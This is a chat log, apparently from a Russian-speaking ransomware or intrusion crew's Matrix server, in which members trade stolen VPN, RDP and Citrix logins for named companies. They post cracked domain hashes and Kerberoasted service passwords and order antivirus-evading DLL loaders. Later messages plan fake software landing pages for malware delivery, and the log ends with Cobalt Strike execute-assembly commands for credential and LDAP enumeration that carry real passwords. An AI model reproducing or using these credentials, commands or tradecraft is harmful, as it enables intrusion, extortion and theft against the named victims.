[2024-01-31 00:31:23] @usernamegg:matrix.bestflowers247.online: 91.208.127.104.tar
--------------------
[2024-01-31 00:31:24] @usernamegg:matrix.bestflowers247.online: 91.208.127.99.tar
--------------------
[2024-01-31 00:31:24] @usernamegg:matrix.bestflowers247.online: 91.208.127.98.tar
--------------------
[2024-01-31 00:31:25] @usernamegg:matrix.bestflowers247.online: 91.208.127.97.tar
--------------------
[2024-01-31 00:31:25] @usernamegg:matrix.bestflowers247.online: 91.208.127.95.tar
--------------------
[2024-01-31 00:31:25] @usernamegg:matrix.bestflowers247.online: 91.208.127.94.tar
--------------------
[2024-01-31 00:31:26] @usernamegg:matrix.bestflowers247.online: 91.208.127.93.tar
--------------------
[2024-01-31 00:31:26] @usernamegg:matrix.bestflowers247.online: 91.208.127.92.tar
--------------------
[2024-01-31 00:31:26] @usernamegg:matrix.bestflowers247.online: 91.208.127.91.tar
--------------------
[2024-01-31 00:31:38] @usernamegg:matrix.bestflowers247.online: дабл от ЛАСТА
--------------------
[2024-01-31 00:31:43] @usernamegg:matrix.bestflowers247.online: синг будет завтра сказал
--------------------
[2024-01-31 00:32:05] @usernamess:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

$$
--------------------
[2024-01-31 00:32:20] @usernamenn:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

NN
--------------------
[2024-01-31 00:49:50] @usernamegg:matrix.bestflowers247.online: ```
198.169.152.3:443:csantos:Winter2024:Evraz-RA
https://www.zoominfo.com/c/evraz-north-america-inc/99354023 680kk Cisco (user v domene EINA)
```
--------------------
[2024-01-31 00:49:59] @usernamegg:matrix.bestflowers247.online: ```
91.223.111.110:443:dspencer:Winter2023
workspace.mercedes-amg-hpp.com
https://www.zoominfo.com/c/mercedes-amg-high-performance-powertrains-ltd/348785257 195kk Citrix
```
--------------------
[2024-01-31 00:50:07] @usernamegg:matrix.bestflowers247.online: https://www.zoominfo.com/c/evraz-north-america-inc/99354023
--------------------
[2024-01-31 00:50:25] @usernamegg:matrix.bestflowers247.online: https://www.zoominfo.com/c/mercedes-amg-high-performance-powertrains-ltd/348785257
--------------------
[2024-01-31 01:00:14] @usernamess:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> ```
> 198.169.152.3:443:csantos:Winter2024:Evraz-RA
> https://www.zoominfo.com/c/evraz-north-america-inc/99354023 680kk Cisco (user v domene EINA)
> ```

$$,NN
--------------------
[2024-01-31 01:20:31] @usernamegg:matrix.bestflowers247.online: https://fastapps.tricore.org/logon/LogonPoint/tmindex.html :simone:111111 нужно 2фа привзяать , попробуем с утра , но номер их стрнаны нужно. сетка за ММ, это лаба полу гос, таких нужно сделать
--------------------
[2024-01-31 01:20:51] @usernamegg:matrix.bestflowers247.online: * `https://fastapps.tricore.org/logon/LogonPoint/tmindex.html :simone:111111 нужно 2фа привзяать , попробуем с утра , но номер их стрнаны нужно. сетка за ММ, это лаба полу гос, таких нужно сделать`
--------------------
[2024-01-31 01:33:54] @usernamegg:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> ```
> 91.223.111.110:443:dspencer:Winter2023
> workspace.mercedes-amg-hpp.com
> https://www.zoominfo.com/c/mercedes-amg-high-performance-powertrains-ltd/348785257 195kk Citrix
> ```

эта сетка еще свободна
--------------------
[2024-01-31 02:00:41] @usernamenn:matrix.bestflowers247.online: есть кто живой?
--------------------
[2024-01-31 04:10:43] @usernamess:matrix.bestflowers247.online: eina_adm_kekhash.txt
--------------------
[2024-01-31 05:34:30] @usernamess:matrix.bestflowers247.online: * `EINA.EVRAZINC.AD/DNORMAN:$DCC2$10240#DNORMAN#fe939196a70d7720416ae2353c63a641`
--------------------
[2024-01-31 05:43:58] @usernamess:matrix.bestflowers247.online: * `eina.evrazinc.ad\\AHAMILTON Winter2024!`
--------------------
[2024-01-31 05:44:03] @usernamess:matrix.bestflowers247.online: * `eina.evrazinc.ad\AHAMILTON Winter2024!`
--------------------
[2024-01-31 05:52:04] @usernamess:matrix.bestflowers247.online: cytray.exe
Добавьте себе, это Cortex
--------------------
[2024-01-31 06:02:13] @usernamenn:matrix.bestflowers247.online: в DNS кобе захостили, хуй убрали, вы че угараете?
--------------------
[2024-01-31 06:02:15] @usernamenn:matrix.bestflowers247.online: X 2024-01-31 в 09.03.54.jpg
--------------------
[2024-01-31 06:02:16] @usernamenn:matrix.bestflowers247.online: cob_1DNS
--------------------
[2024-01-31 06:30:11] @usernameboy:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> sent a file.

$krb5tgs$23$*EVR-SA-RACF$eina.evrazinc.ad$MSSQLSvc/REGW107V.eina.evrazinc.ad@eina.evraz......8316a:Time2Sync!

--------------------
[2024-01-31 06:31:11] @usernamess:matrix.bestflowers247.online: dc9d30eadd4354c7bc973fcb6e79ddaf
--------------------
[2024-01-31 06:52:41] @usernamehunter:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> sent a file.

$krb5tgs$23$*REG-SA-SQLService$eina.evrazinc.ad$MSSQLSvc/REGWCIPAPP01V.eina.evrazinc.ad:1433@eina.evrazinc.ad*$1d1fae00c424........27d8991c4b2ead0:s@1service
$krb5tgs$23$*pdx-sa-sqlservice$eina.evrazinc.ad$MSSQLSvc/PDXWIVARAP01V.eina.evrazinc.ad:1433@eina.evrazinc.ad*$7bf06698ad35........1489ca26db18059:s@1service

--------------------
[2024-01-31 07:03:42] @usernamecc:matrix.bestflowers247.online: Доброе
--------------------
[2024-01-31 07:06:10] @usernameww:matrix.bestflowers247.online: Dobroe!
--------------------
[2024-01-31 07:06:12] @usernamett:matrix.bestflowers247.online: Dobroe!
--------------------
[2024-01-31 07:06:55] @usernamezz:matrix.bestflowers247.online: Доброе
--------------------
[2024-01-31 07:07:02] @usernamemm:matrix.bestflowers247.online: доброе
--------------------
[2024-01-31 07:19:36] @usernameyy:matrix.bestflowers247.online: signle de в блеклистах находится
--------------------
[2024-01-31 07:19:44] @usernameyy:matrix.bestflowers247.online: singl _ DE.ovpn
--------------------
[2024-01-31 07:19:47] @usernameyy:matrix.bestflowers247.online: не могу на некоторые нужные сайты заходить
--------------------
[2024-01-31 07:20:35] @usernameww:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

WW
--------------------
[2024-01-31 07:20:42] @usernamett:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

TT
--------------------
[2024-01-31 07:21:37] @usernamecc:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

CC
--------------------
[2024-01-31 07:21:41] @usernamezz:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

ZZ
--------------------
[2024-01-31 07:21:44] @usernamemm:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

MM
--------------------
[2024-01-31 07:22:41] @usernamett:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> ```
> 91.223.111.110:443:dspencer:Winter2023
> workspace.mercedes-amg-hpp.com
> https://www.zoominfo.com/c/mercedes-amg-high-performance-powertrains-ltd/348785257 195kk Citrix
> ```

++
--------------------
[2024-01-31 07:25:04] @usernameyy:matrix.bestflowers247.online: и скорость сегодня плохая, даже поиском пользоваться не могу
--------------------
[2024-01-31 07:25:28] @usernamett:matrix.bestflowers247.online: ```
64.176.219.106:42749
185.219.221.136:37885
```
--------------------
[2024-01-31 07:48:26] @usernamett:matrix.bestflowers247.online: ```
64.176.219.106:40535
185.219.221.136:38391
```
--------------------
[2024-01-31 08:18:29] @usernamess:matrix.bestflowers247.online: ```
JAKUBCZYKM:$DCC2$10240#JAKUBCZYKM#11f4a2cea988dce869189b8f3c72acdf
GVARADHARAJ:$DCC2$10240#GVARADHARAJ#77fb528fe4ec2a2bd2c16bf970820a41
```
--------------------
[2024-01-31 08:46:51] @usernameboy:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> ```
> JAKUBCZYKM:$DCC2$10240#JAKUBCZYKM#11f4a2cea988dce869189b8f3c72acdf
> GVARADHARAJ:$DCC2$10240#GVARADHARAJ#77fb528fe4ec2a2bd2c16bf970820a41
> ```

$DCC2$10240#gvaradharaj#77fb528fe4ec2a2bd2c16bf970820a41:J@ne#2023

--------------------
[2024-01-31 09:57:34] @lapa:matrix.bestflowers247.online: Привет
--------------------
[2024-01-31 09:57:48] @lapa:matrix.bestflowers247.online: Дан сделает exe  &
--------------------
[2024-01-31 09:57:49] @lapa:matrix.bestflowers247.online: ?
--------------------
[2024-01-31 10:02:00] @lapa:matrix.bestflowers247.online: мне тут отлучится на час нужно примерно
--------------------
[2024-01-31 10:02:12] @usernamegg:matrix.bestflowers247.online: сегодня будет свежий синг
--------------------
[2024-01-31 10:02:25] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-01-31 10:02:28] @usernamegg:matrix.bestflowers247.online: нет
--------------------
[2024-01-31 10:02:38] @usernamegg:matrix.bestflowers247.online: я ищу другой лоадер куда можно слать
--------------------
[2024-01-31 10:03:05] @usernamegg:matrix.bestflowers247.online: я сегодня задержался как вчера чп в компом и сегодня свет вырбуили тупо даже модем зарядить не мог
--------------------
[2024-01-31 10:05:04] @usernamegg:matrix.bestflowers247.online: ```
https://mail.turner-law.com:4443/sslvpn_logon.shtml:john:john:TURNER.local
https://www.zoominfo.com/c/max--planck--gesellschaft/75386008
```
--------------------
[2024-01-31 10:05:18] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-01-31 10:05:18] @usernamegg:matrix.bestflowers247.online: ок
--------------------
[2024-01-31 10:05:23] @n3auxaxl:matrix.collectionofmanager.space: Привет, если что все по плану идет, все получается
--------------------
[2024-01-31 10:05:50] @usernamegg:matrix.bestflowers247.online: Website
www.mpg.de
Revenue
$2.7 Billion
--------------------
[2024-01-31 10:20:22] @usernamemm:matrix.bestflowers247.online: 3_64.bin
--------------------
[2024-01-31 10:24:52] @muaddib6:matrix.org: Занимаюсь
--------------------
[2024-01-31 10:39:12] @u123:matrix.bestflowers247.online: привет, а что нового в 4.91? можешь дать клиент потыкать?
--------------------
[2024-01-31 10:44:11] @usernameww:matrix.bestflowers247.online: > <@usernamemm:matrix.bestflowers247.online> sent a file.

симантек обойти
--------------------
[2024-01-31 10:44:52] @muaddib6:matrix.org: Сделаем. Скоро пришлю.
--------------------
[2024-01-31 10:44:55] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-01-31 11:19:43] @sunortla:matrix.bestflowers247.online: Привет
--------------------
[2024-01-31 11:19:47] @lapa:matrix.bestflowers247.online: понял
--------------------
[2024-01-31 11:20:08] @sunortla:matrix.bestflowers247.online: Может дать доступ к тачке где edr, чтоб тестировать запуски и паль?
--------------------
[2024-01-31 11:20:58] @muaddib6:matrix.org: > <@usernamemm:matrix.bestflowers247.online> sent a file.

Готово. rundll32 dll.dll,runstmt
--------------------
[2024-01-31 11:21:03] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-01-31 11:21:18] @muaddib6:matrix.org: 1.7z
--------------------
[2024-01-31 11:21:51] @muaddib6:matrix.org: Жду информацию по запуску и работоспособности
--------------------
[2024-01-31 11:55:43] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-01-31 11:55:48] @usernamegg:matrix.bestflowers247.online: нету пока
--------------------
[2024-01-31 11:55:54] @usernamegg:matrix.bestflowers247.online: могу обычную впску дать
--------------------
[2024-01-31 11:56:01] @usernamegg:matrix.bestflowers247.online: там обновишь деф и будешь тестировать
--------------------
[2024-01-31 11:56:18] @usernamegg:matrix.bestflowers247.online: да все так же вроде
--------------------
[2024-01-31 11:56:27] @usernamegg:matrix.bestflowers247.online: у меня пустых нет
--------------------
[2024-01-31 11:56:32] @usernamegg:matrix.bestflowers247.online: только наполнены таргетами
--------------------
[2024-01-31 11:59:30] @u123:matrix.bestflowers247.online: работы хватает видимо?)
--------------------
[2024-01-31 12:01:01] @muaddib6:matrix.org: > <@usernamemm:matrix.bestflowers247.online> sent a file.

Вот еще сборка. rundll32 dll.dll,SFanhzpmfnGz
--------------------
[2024-01-31 12:01:24] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-31 12:01:26] @muaddib6:matrix.org: 2.7z
--------------------
[2024-01-31 12:01:30] @usernamegg:matrix.bestflowers247.online: я загружен
--------------------
[2024-01-31 12:01:47] @usernamegg:matrix.bestflowers247.online: спам если запущу то вообще зарыться можно
--------------------
[2024-01-31 12:01:55] @usernameww:matrix.bestflowers247.online: > <@muaddib6:matrix.org> Жду информацию по запуску и работоспособности

спасибо! но проверить только позже сможем. Там ушел доступ
--------------------
[2024-01-31 12:02:16] @usernamegg:matrix.bestflowers247.online: https://www.zoominfo.com/c/the-gainsborough-bath-spa/369408791
https://www.zoominfo.com/c/sda-inc/348146994
https://www.zoominfo.com/c/c--com-group-inc/18157419
https://www.zoominfo.com/c/western-star-nurseries-llc/371745841
https://www.zoominfo.com/c/wotek-corp/42795422
https://www.zoominfo.com/c/les-fournil/461177303
--------------------
[2024-01-31 12:02:20] @muaddib6:matrix.org: Ок. Сервак живой езе? Делаем с инфецированием еще кобу
--------------------
[2024-01-31 12:04:51] @usernameww:matrix.bestflowers247.online: `https://www.zoominfo.com/c/c--com-group-inc/18157419`
--------------------
[2024-01-31 12:11:12] @sunortla:matrix.bestflowers247.online: +
--------------------
[2024-01-31 12:21:06] @u123:matrix.bestflowers247.online: а так с впнок много дают?
--------------------
[2024-01-31 12:37:35] @usernamegg:matrix.bestflowers247.online: ```
https://sms-activation-service.com

aslan11
a(AUD)#U)a0sdkas0

https://mail.proton.me

jsliudas09i0329@proton.me
jsliudas09
```

--------------------
[2024-01-31 12:37:59] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-31 12:38:03] @usernamegg:matrix.bestflowers247.online: постоянно
--------------------
[2024-01-31 12:38:10] @usernamegg:matrix.bestflowers247.online: брутеры ебашат
--------------------
[2024-01-31 12:39:20] @ssd:matrix.bestflowers247.online: hi
--------------------
[2024-01-31 12:39:26] @ssd:matrix.bestflowers247.online: privet , vsem
--------------------
[2024-01-31 12:39:32] @ssd:matrix.bestflowers247.online: est kto?
--------------------
[2024-01-31 12:42:47] @usernamegg:matrix.bestflowers247.online: ```
20.97.201.7:3389;CCOMGROUPINC\sonicwall;Sonicwall
https://www.zoominfo.com/c/c--com-group-inc/18157419
```
--------------------
[2024-01-31 12:43:02] @usernamejj:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

++
--------------------
[2024-01-31 12:45:14] @u123:matrix.bestflowers247.online: мм прикольно, я думал брутом уже ничего не выдернешь
--------------------
[2024-01-31 12:46:01] @usernameww:matrix.bestflowers247.online: image.png
--------------------
[2024-01-31 12:47:19] @usernameww:matrix.bestflowers247.online: `http://temp.sh/INsKN/image111.png`
--------------------
[2024-01-31 12:53:33] @usernamezz:matrix.bestflowers247.online: `$DCC2$10240#lofflersvc#59a0ced0e89f8044dfa24eadebaee982`
--------------------
[2024-01-31 12:53:44] @usernamezz:matrix.bestflowers247.online: `$DCC2$10240#Administrator#e7abf452c8bb73895f7b9d850097ddd4`
--------------------
[2024-01-31 12:57:08] @usernamegg:matrix.bestflowers247.online: я тоже
--------------------
[2024-01-31 12:57:14] @usernamegg:matrix.bestflowers247.online: но у них выходит
--------------------
[2024-01-31 12:57:18] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-01-31 12:57:37] @usernameboy:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> sent a file.

$krb5tgs$23$*ivara$eina.evrazinc.ad$MSSQLSvc/psw-maint.pdx.osm.ad:2099@eina.evrazinc.ad*$f47d27......89d9b:Iv@r@#11

--------------------
[2024-01-31 12:57:57] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-31 12:58:04] @usernamegg:matrix.bestflowers247.online: сейчас прогера добавлю
--------------------
[2024-01-31 12:58:26] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-31 12:58:52] @usernamegg:matrix.bestflowers247.online: обязательно
--------------------
[2024-01-31 12:59:00] @usernamezz:matrix.bestflowers247.online: `ee6ab1aaa455e31f87bde145bd19c5b7`
--------------------
[2024-01-31 12:59:04] @usernamezz:matrix.bestflowers247.online: `a67a230e7e3deb5221ea42a0236726e8`
--------------------
[2024-01-31 13:01:45] @u123:matrix.bestflowers247.online: хорошие базы пассов и айпишников значит
--------------------
[2024-01-31 13:01:55] @u123:matrix.bestflowers247.online: молорики что могу сказать, нашли подход
--------------------
[2024-01-31 13:02:59] @n3auxaxl:matrix.collectionofmanager.space: Всем привет!
--------------------
[2024-01-31 13:03:31] @ssd:matrix.bestflowers247.online: dostup dadite ? starie logi tam est?
--------------------
[2024-01-31 13:03:42] @ssd:matrix.bestflowers247.online: i dumau budu gotov k pnc startanut
--------------------
[2024-01-31 13:03:47] @usernameboy:matrix.bestflowers247.online: ee6ab1aaa455e31f87bde145bd19c5b7:loFFler#1

--------------------
[2024-01-31 13:04:02] @ssd:matrix.bestflowers247.online: dogovarivalis na 15 prosto u mena vse sdohlo , shas ochen chuvstvitelno google otnositsa
--------------------
[2024-01-31 13:04:04] @usernamezz:matrix.bestflowers247.online: +
--------------------
[2024-01-31 13:04:17] @ssd:matrix.bestflowers247.online: est idea , po corp
--------------------
[2024-01-31 13:04:42] @n3auxaxl:matrix.collectionofmanager.space: > <@ssd:matrix.bestflowers247.online> dostup dadite ? starie logi tam est?

да, чуть позже
--------------------
[2024-01-31 13:04:43] @n3auxaxl:matrix.collectionofmanager.space: логи остались
--------------------
[2024-01-31 13:05:03] @ssd:matrix.bestflowers247.online: delau lening softa corp oni sami zahodat ukazivaut company i mail, telefon
--------------------
[2024-01-31 13:05:09] @n3auxaxl:matrix.collectionofmanager.space: креды те же, линки поменялись и там надо будет установить extension кастомный, чтобы дотсуп в панель был
--------------------
[2024-01-31 13:05:17] @ssd:matrix.bestflowers247.online: mi im shlem fail na ystonosku
--------------------
[2024-01-31 13:05:30] @ssd:matrix.bestflowers247.online: s instrukciy kak skachat
--------------------
[2024-01-31 13:05:48] @ssd:matrix.bestflowers247.online: produbliruy
--------------------
[2024-01-31 13:05:50] @ssd:matrix.bestflowers247.online: dostup
--------------------
[2024-01-31 13:05:52] @ssd:matrix.bestflowers247.online: pliz
--------------------
[2024-01-31 13:06:09] @ssd:matrix.bestflowers247.online: a sdelal stilak shtobi persi avto tashil?
--------------------
[2024-01-31 13:06:25] @ssd:matrix.bestflowers247.online: sps
--------------------
[2024-01-31 13:06:31] @n3auxaxl:matrix.collectionofmanager.space: > <@ssd:matrix.bestflowers247.online> a sdelal stilak shtobi persi avto tashil?

да
--------------------
[2024-01-31 13:06:46] @usernamezz:matrix.bestflowers247.online: `$DCC2$10240#loffleradmin#6bfbdc88ba8c5199863fea8b167c49bb`
--------------------
[2024-01-31 13:07:24] @usernamezz:matrix.bestflowers247.online: `$DCC2$10240#Administrator#065029ced40479629e9433d371a30361`
--------------------
[2024-01-31 13:09:38] @ssd:matrix.bestflowers247.online: 2) moment vzal i aki rebat mogu segodna testi delat
--------------------
[2024-01-31 13:09:44] @ssd:matrix.bestflowers247.online: nado na vcc zagnat
--------------------
[2024-01-31 13:09:58] @ssd:matrix.bestflowers247.online: moi aki budut v pnd
--------------------
[2024-01-31 13:10:25] @ssd:matrix.bestflowers247.online: est aki tut y sosedey ,mpjem segodna prolitsa na test
--------------------
[2024-01-31 13:10:33] @ssd:matrix.bestflowers247.online: moi aki budut k pnd
--------------------
[2024-01-31 13:17:53] @usernamezz:matrix.bestflowers247.online: `YellowPlane76!`
--------------------
[2024-01-31 13:22:50] @ssd:matrix.bestflowers247.online: 5vcc po 1k kinem?
--------------------
[2024-01-31 13:22:57] @ssd:matrix.bestflowers247.online: mojem tetit
--------------------
[2024-01-31 13:23:13] @ssd:matrix.bestflowers247.online: > <@n3auxaxl:matrix.collectionofmanager.space> да

kakie y nas lendi est napomni , pliz
--------------------
[2024-01-31 13:24:40] @n3auxaxl:matrix.collectionofmanager.space: > <@ssd:matrix.bestflowers247.online> kakie y nas lendi est napomni , pliz

сек
--------------------
[2024-01-31 13:28:10] @n3auxaxl:matrix.collectionofmanager.space: - adobe
- anydesk
- citrix
- discord
- slack
- tablesau
- teamviewer
- webex
- zoom

--------------------
[2024-01-31 13:28:21] @n3auxaxl:matrix.collectionofmanager.space: вот
--------------------
[2024-01-31 13:31:38] @ssd:matrix.bestflowers247.online: ewe vopros po injetirovaniu
--------------------
[2024-01-31 13:31:47] @ssd:matrix.bestflowers247.online: budew realizovivat
--------------------
[2024-01-31 13:31:50] @ssd:matrix.bestflowers247.online: ?
--------------------
[2024-01-31 13:32:53] @n3auxaxl:matrix.collectionofmanager.space: > <@ssd:matrix.bestflowers247.online> ewe vopros po injetirovaniu

инжектированию чего?
--------------------
[2024-01-31 13:33:08] @ssd:matrix.bestflowers247.online: web injekti , dla raboti mne nujno vstavit
--------------------
[2024-01-31 13:33:25] @ssd:matrix.bestflowers247.online: botam
--------------------
[2024-01-31 13:33:54] @n3auxaxl:matrix.collectionofmanager.space: это exe обычный будет?
--------------------
[2024-01-31 13:33:56] @ssd:matrix.bestflowers247.online: net
--------------------
[2024-01-31 13:34:28] @n3auxaxl:matrix.collectionofmanager.space: а что тогда?
--------------------
[2024-01-31 13:34:37] @n3auxaxl:matrix.collectionofmanager.space: я смогу только exe инжектить
--------------------
[2024-01-31 13:39:15] @usernamejj:matrix.bestflowers247.online: rbs.txt
--------------------
[2024-01-31 13:40:08] @usernameboy:matrix.bestflowers247.online: $krb5tgs$23$*Administrator$ffp.ffppkg.co.uk$MS..0d9afbf1:Goodmorningvietnam!

--------------------
[2024-01-31 13:40:20] @usernamejj:matrix.bestflowers247.online: > <@usernameboy:matrix.bestflowers247.online> $krb5tgs$23$*Administrator$ffp.ffppkg.co.uk$MS..0d9afbf1:Goodmorningvietnam!

++
--------------------
[2024-01-31 13:44:05] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-31 13:44:15] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-31 13:44:25] @usernamegg:matrix.bestflowers247.online: ну там все равно пассы очень уж простые
--------------------
[2024-01-31 13:47:21] @ssd:matrix.bestflowers247.online: bc1qqj6pp5d00rq8646cxj2648vkwkm9pqxafd3zmt
--------------------
[2024-01-31 13:49:00] @muaddib6:matrix.org: > <@usernamemm:matrix.bestflowers247.online> sent a file.

А это инфецированием ехе и длл. rundll32 file.dll, DllGetClassObject
--------------------
[2024-01-31 13:49:19] @muaddib6:matrix.org: 3.7z
--------------------
[2024-01-31 14:05:28] @ssd:matrix.bestflowers247.online: lendi gotovi?
--------------------
[2024-01-31 14:05:39] @ssd:matrix.bestflowers247.online: kakoy fail budem gruzit?
--------------------
[2024-01-31 14:09:42] @ssd:matrix.bestflowers247.online: ok
--------------------
[2024-01-31 14:09:45] @n3auxaxl:matrix.collectionofmanager.space: Это все позже обсудим, мне нужно закончить пару дел до этого
--------------------
[2024-01-31 14:09:49] @ssd:matrix.bestflowers247.online: dostp hot day poka
--------------------
[2024-01-31 14:10:01] @n3auxaxl:matrix.collectionofmanager.space: Я думаю что MSI, а там посмотрим что и как
--------------------
[2024-01-31 14:10:11] @n3auxaxl:matrix.collectionofmanager.space: > <@ssd:matrix.bestflowers247.online> dostp hot day poka

+++
--------------------
[2024-01-31 14:10:11] @n3auxaxl:matrix.collectionofmanager.space: сек
--------------------
[2024-01-31 14:10:59] @n3auxaxl:matrix.collectionofmanager.space: SetupAuth.mp4
--------------------
[2024-01-31 14:11:10] @n3auxaxl:matrix.collectionofmanager.space: PAuthExtension.7z
--------------------
[2024-01-31 14:11:21] @n3auxaxl:matrix.collectionofmanager.space: PASS: 84FEYd7evUrC7lNAYm2toAlMDnR2JRSf2AwLgC1pYPpk7vjB
--------------------
[2024-01-31 14:11:42] @ssd:matrix.bestflowers247.online: ystonovka?
--------------------
[2024-01-31 14:12:25] @n3auxaxl:matrix.collectionofmanager.space: Это extension, там инстуркция и вот видео, как все сделать, сейчас скину ссылку, минуту
--------------------
[2024-01-31 14:13:22] @usernamecc:matrix.bestflowers247.online: leonardssyrups.com
--------------------
[2024-01-31 14:13:41] @n3auxaxl:matrix.collectionofmanager.space: https://4c5kb5ly.cofoundermanagerplatform.online/7e6375fd-0860-4a88-8d60-7beac46dd708/EuvJWNrTbdVDGRaLhxJ6LZvMowWfIjYyDkmjOkuXO8Asvnk9?CDw9iTqdy=DRuqJfT7ezr4zZfEMJlzQP5ITV5fiTVPbjXc6DhxvTRscBXJfeFW

USER: SSD
PASS: PdGkyBKO1hfTiD1l5MFPeh1p6SQpDQh3

USER: SSD_SUPPORT
PASS: 9Z4FjoXWmEeXuZ9NzcFK05YBrNs8ryAH
--------------------
[2024-01-31 14:13:53] @n3auxaxl:matrix.collectionofmanager.space: Вот, ссылка для входа и пассы
--------------------
[2024-01-31 14:15:02] @n3auxaxl:matrix.collectionofmanager.space: Напишешь как зайдешь или будут вопросы
--------------------
[2024-01-31 14:19:11] @ssd:matrix.bestflowers247.online: .hta
--------------------
[2024-01-31 14:19:14] @ssd:matrix.bestflowers247.online: shto za fail
--------------------
[2024-01-31 14:19:16] @ssd:matrix.bestflowers247.online: ?
--------------------
[2024-01-31 14:19:29] @ssd:matrix.bestflowers247.online: spalil tut
--------------------
[2024-01-31 14:19:31] @ssd:matrix.bestflowers247.online: gruzat ego
--------------------
[2024-01-31 14:20:22] @n3auxaxl:matrix.collectionofmanager.space: .hta - html application, там внутри vbs или js, но на него MOTW идет, делал уже такой файл, не очень хорошо идет
--------------------
[2024-01-31 14:20:22] @ssd:matrix.bestflowers247.online: ponal
--------------------
[2024-01-31 14:24:13] @ssd:matrix.bestflowers247.online: skinew day znat
--------------------
[2024-01-31 14:29:15] @u123:matrix.bestflowers247.online: хм, тогда странно
--------------------
[2024-01-31 14:57:45] @usernamegg:matrix.bestflowers247.online: https://www.zoominfo.com/c/max--planck--gesellschaft/75386008
--------------------
[2024-01-31 14:57:54] @usernamegg:matrix.bestflowers247.online: https://141.14.231.10:443/+CSCOE+/logon.html :angelo:public:mpikg_mfa_webvpn_tunnel-group  2.7б
https://141.14.231.10:443/+CSCOE+/logon.html:angelo:public:mpikg_mfa_webvpn_tunnel-group
https://141.14.231.16:443/+CSCOE+/logon.html:angelo:public:mpikg_mfa_webvpn_tunnel-group
https://141.14.231.16:443/+CSCOE+/logon.html:angelo:public:mpikg_mfa_webvpn_tunnel-group
--------------------
[2024-01-31 14:58:12] @usernamegg:matrix.bestflowers247.online: https://mpikg-fpr-2110.mpikg.mpg.de/+CSCOE+/logon.html:angelo:public:mpikg_mfa_webvpn_tunnel-group
--------------------
[2024-01-31 14:58:16] @usernamegg:matrix.bestflowers247.online: и еще в таком виде
--------------------
[2024-01-31 14:58:58] @usernamegg:matrix.bestflowers247.online: https://50.173.219.157/sslvpn_logon.shtml:test:Welcome123!:sherman.domain

400кк аренда недвиги
--------------------
[2024-01-31 14:59:10] @usernamegg:matrix.bestflowers247.online: * _____
https://50.173.219.157/sslvpn\_logon.shtml:test:Welcome123!:sherman.domain

400кк аренда недвиги
--------------------
[2024-01-31 14:59:27] @usernamegg:matrix.bestflowers247.online: __
--------------------
[2024-01-31 14:59:32] @usernamegg:matrix.bestflowers247.online: * ______
--------------------
[2024-01-31 14:59:35] @usernamemm:matrix.bestflowers247.online: `https://50.173.219.157/sslvpn_logon.shtml:test:Welcome123!:sherman.domain`
--------------------
[2024-01-31 14:59:58] @usernamegg:matrix.bestflowers247.online: _____
https://www.zoominfo.com/c/global-healthcare-exchange-llc/15975033

https://ne-asa.ghx.com/+CSCOE+/logon.html:testuser1:testuser1

_____
--------------------
[2024-01-31 15:31:27] @usernamezz:matrix.bestflowers247.online: ```
1a6b8d18129e2c71325b3b62be206bdc
7def29cec3822225e7b3d4e468c7661c
0c76c7a60166b2a3cbff7465df898578
a07a92a85d7f2106d76a7c42e260a77d
aa0370b6923aebcba7005fd10ef25cbf
```
--------------------
[2024-01-31 15:31:36] @usernameyy:matrix.bestflowers247.online: я завтра приду к 12 ладно? надо на права сходить
--------------------
[2024-01-31 16:11:33] @ssd:matrix.bestflowers247.online: tut
--------------------
[2024-01-31 16:11:47] @ssd:matrix.bestflowers247.online: > <@ssd:matrix.bestflowers247.online> skinew day znat

jdu
--------------------
[2024-01-31 16:11:53] @ssd:matrix.bestflowers247.online: kogda zakonchiw
--------------------
[2024-01-31 16:12:04] @ssd:matrix.bestflowers247.online: lendi jdat kogda
--------------------
[2024-01-31 16:44:12] @usernamess:matrix.bestflowers247.online: goc_creds.exe
--------------------
[2024-01-31 16:44:15] @usernamess:matrix.bestflowers247.online: ```
execute-assembly goc_creds.exe -fast -sort -sortplus -domain CORP.AJGCO.COM -controller 10.240.2.103 -ldaplogin s-dtadmin -ldappass Dt2008!
execute-assembly goc_creds.exe -fast -sort -sortplus -domain CORP.AJGCO.COM -controller 10.240.2.103 -ldaplogin gomain\admin -ldappass Dt2008!
```
--------------------
[2024-01-31 16:44:32] @usernamess:matrix.bestflowers247.online: processes_ldap.exe
--------------------
[2024-01-31 16:44:36] @usernamess:matrix.bestflowers247.online: `execute-assembly processes_ldap.exe -ldaplogin AHAMILTON -ldappass Winter2024! -controller 10.106.6.3 -threads 5 -pingtimeout 30 -proctimeout 60 -fromfile C:\Users\Administrator\Desktop\EVRAZINC\list.txt -throttle 5 -outresult C:\Users\Administrator\Desktop\EVRAZINC\eina_users_outfile.xls`
--------------------
